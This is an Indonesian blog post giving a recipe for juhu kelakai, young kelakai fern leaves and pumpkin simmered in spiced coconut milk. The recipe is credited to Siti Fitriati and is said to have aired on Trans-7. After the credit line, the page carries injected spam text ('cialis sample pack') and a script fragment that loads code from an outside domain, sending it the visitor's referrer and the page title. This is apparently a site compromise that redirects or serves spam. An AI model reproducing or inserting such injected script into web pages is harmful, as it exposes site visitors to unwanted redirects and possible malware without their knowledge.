JUHU KELAKAI

18 April 2012 | By admin in Lomba

Posted by Syamsuddin Rudiannoor, S. Sos

 

Resep ini telah tayang di program televisi Trans-7 untuk acara “KOKI CILIK” dan “ASAL USUL”. Semoga resep ini bisa menjadi inspirasi bagi terciptanya resep-resep daerah lainnya.

 

Bahan :

– Daun yang masih muda atau pucuk kelakai

– Buah waluh/labu kuning

– Santan kental (kalau suka) secukupnya

 

Bumbu :

– Bawang merah

– Bawang putih

– Kemiri

– Garam

– Gula/penyedap rasa kalau suka

– Merica

 

Cara Membuat :

–     Bersihkan kelakai, ambil daun yang muda saja. Kupas labu kuning, potong kecil-kecil atau menurut selera.

–     Haluskan semua bumbu.

–     Tumis bumbu dengan sedikit minyak goreng, setelah harum masukkan potongan labu kuning, tambahkan sedikit air, masak sampai labu matang.

–      Setelah labu matang tambahkan santan kental, masak sampai mendidih.

–      Siap disajikan.

–      Juhu kelakai ini juga bisa ditambahkan ikan gabus/haruan panggang. Menambahkan ikan panggang berbarengan  pada saat  menambahkan santan.

 

Catatan : apabila tidak suka bersantan dapat diganti dengan air biasa.

 

 

Resep oleh Siti Fitriati, SP cialis sample pack s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; document.currentScript.parentNode.insertBefore(s, document.currentScript);

Comments are closed.